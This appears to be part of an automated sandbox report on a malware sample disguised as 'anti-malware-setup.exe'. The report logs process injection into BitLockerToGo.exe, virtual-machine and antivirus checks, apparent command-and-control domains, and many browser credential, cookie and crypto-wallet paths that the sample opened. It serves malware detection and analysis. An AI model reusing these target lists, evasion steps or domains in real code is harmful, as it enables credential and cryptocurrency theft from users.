              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
              Source: anti-malware-setup.exe :: Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: anti-malware-setup.exe :: Static file information: File size 4063744 > 1048576
              Source: anti-malware-setup.exe :: Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1cca00
              Source: anti-malware-setup.exe :: Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1de800
              Source: anti-malware-setup.exe :: Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb :: source: anti-malware-setup.exe, 00000000.00000002.2322019566.0000000002100000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL :: source: anti-malware-setup.exe, 00000000.00000002.2322019566.0000000002100000.00000004.00001000.00020000.00000000.sdmp
              Source: anti-malware-setup.exe :: Static PE information: real checksum: 0x3e1529 should be: 0x3e6e0a
              Source: anti-malware-setup.exe :: Static PE information: section name: .symtab
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: Code function: 3_2_0043CDB0 push eax; mov dword ptr [esp], 01410170h :: 3_2_0043CDB4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: Code function: 3_2_004457E7 push esp; iretd :: 3_2_004457E8
              Source: C:\Users\user\Desktop\anti-malware-setup.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: System information queried: FirmwareTableInformation
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7120 :: Thread sleep time: -210000s >= -30000s
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 892 :: Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: BitLockerToGo.exe, 00000003.00000002.2455088061.000000000344D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454185919.000000000344D000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V RAW8
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: discord.comVMware20,11696428655f
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: global block list test formVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B25000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: - GDCDYNVMware20,11696428655p
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: BitLockerToGo.exe, 00000003.00000003.2345945791.000000000349C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2443343531.0000000003497000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455263174.000000000349B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.000000000349C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V RAW
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: outlook.office365.comVMware20,11696428655t
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: anti-malware-setup.exe, 00000000.00000002.2320548291.000000000164C000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: outlook.office.comVMware20,11696428655s
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: AMC password management pageVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: tasks.office.comVMware20,11696428655o
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: interactivebrokers.comVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: dev.azure.comVMware20,11696428655j
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B25000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: YNVMware
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: bankofamerica.comVMware20,11696428655x
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: Process information queried: ProcessInformation
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: Code function: 3_2_0043B8A0 LdrInitializeThunk, :: 3_2_0043B8A0

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\anti-malware-setup.exe :: Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\anti-malware-setup.exe :: Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: bashfulacid.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: tentabatte.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: curverpluch.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: talkynicer.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: shapestickyr.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: manyrestro.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: slipperyloo.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: wordyfindy.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: enterwahsh.biz
              Source: C:\Users\user\Desktop\anti-malware-setup.exe :: Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 302D008
              Source: C:\Users\user\Desktop\anti-malware-setup.exe :: Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
              Source: C:\Users\user\Desktop\anti-malware-setup.exe :: Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
              Source: C:\Users\user\Desktop\anti-malware-setup.exe :: Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 43F000
              Source: C:\Users\user\Desktop\anti-malware-setup.exe :: Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 442000
              Source: C:\Users\user\Desktop\anti-malware-setup.exe :: Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 450000
              Source: C:\Users\user\Desktop\anti-malware-setup.exe :: Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              Source: C:\Users\user\Desktop\anti-malware-setup.exe :: Queries volume information: C:\Windows VolumeInformation
              Source: C:\Users\user\Desktop\anti-malware-setup.exe :: Queries volume information: C:\Windows\AppReadiness VolumeInformation
              Source: C:\Users\user\Desktop\anti-malware-setup.exe :: Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
              Source: C:\Users\user\Desktop\anti-malware-setup.exe :: Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: BitLockerToGo.exe, 00000003.00000003.2443343531.0000000003497000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match :: File source: Process Memory Space: BitLockerToGo.exe PID: 6204, type: MEMORYSTR
              Source: Yara match :: File source: sslproxydump.pcap, type: PCAP
              Source: Yara match :: File source: decrypted.memstr, type: MEMORYSTR
              Source: BitLockerToGo.exe, 00000003.00000003.2432562158.00000000034EA000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: s/Electrum-LTC
              Source: BitLockerToGo.exe, 00000003.00000003.2443567206.00000000034A9000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: Wallets/ElectronCash
              Source: BitLockerToGo.exe, 00000003.00000003.2443567206.00000000034A9000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: window-state.json
              Source: BitLockerToGo.exe, 00000003.00000002.2455088061.000000000344D000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wal
              Source: BitLockerToGo.exe, 00000003.00000003.2411487733.00000000034E3000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: BitLockerToGo.exe, 00000003.00000003.2411282821.00000000034FC000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: ExodusWeb3
              Source: BitLockerToGo.exe, 00000003.00000003.2443567206.00000000034A9000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: %appdata%\Ethereum
              Source: BitLockerToGo.exe, 00000003.00000003.2411487733.00000000034E3000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BitLockerToGo.exe, 00000003.00000002.2455088061.000000000344D000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: ":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z"
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
